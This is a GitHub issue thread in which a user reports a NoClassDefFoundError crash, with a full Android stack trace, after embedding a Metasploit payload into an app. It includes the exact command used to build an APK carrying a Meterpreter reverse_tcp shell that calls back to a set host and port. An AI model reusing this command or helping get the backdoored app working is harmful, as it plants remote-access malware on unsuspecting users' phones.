### ISSUE TITLE
java.lang.NoClassDefFoundError

### ISSUE THREAD

**Issue by ghost** [xc0d3rz/metasploit-apk-embed-payload#32]
I've just embeded a ms payload into an app but when I try to run the application it fails with **java.lang.NoClassDefFoundError**

> 05-31 20:39:12.207 E/AndroidRuntime( 2900): FATAL EXCEPTION: main
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): Process: com.example.fabio.myapplication, PID: 2900
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): java.lang.NoClassDefFoundError: Failed resolution of: Lcom/metasploit/stage/d;
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at com.metasploit.stage.Payload.startInPath(Unknown Source)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at com.metasploit.stage.Payload.start(Unknown Source)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at com.example.fabio.myapplication.MainActivity.onCreate(MainActivity.java:10)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at android.app.Activity.performCreate(Activity.java:6679)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1118)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2618)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2726)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at android.app.ActivityThread.-wrap12(ActivityThread.java)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1477)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at android.os.Handler.dispatchMessage(Handler.java:102)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at android.os.Looper.loop(Looper.java:154)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at android.app.ActivityThread.main(ActivityThread.java:6119)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at java.lang.reflect.Method.invoke(Native Method)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:886)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:776)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): Caused by: java.lang.ClassNotFoundException: Didn't find class "com.metasploit.stage.d" on path: DexPathList[[zip file "/data/app/com.example.fabio.myapplication-1/base.apk"],nativeLibraryDirectories=[/data/app/com.example.fabio.myapplication-1/lib/x86, /system/lib, /vendor/lib]]
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at java.lang.ClassLoader.loadClass(ClassLoader.java:380)
> 05-31 20:39:12.207 E/AndroidRuntime( 2900): 	at java.lang.ClassLoader.loadClass(ClassLoader.java:312)

The command to generate the apk was just:

`./run myapp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=5555`

**Comment by Dorabot2222** [comment]
Same error
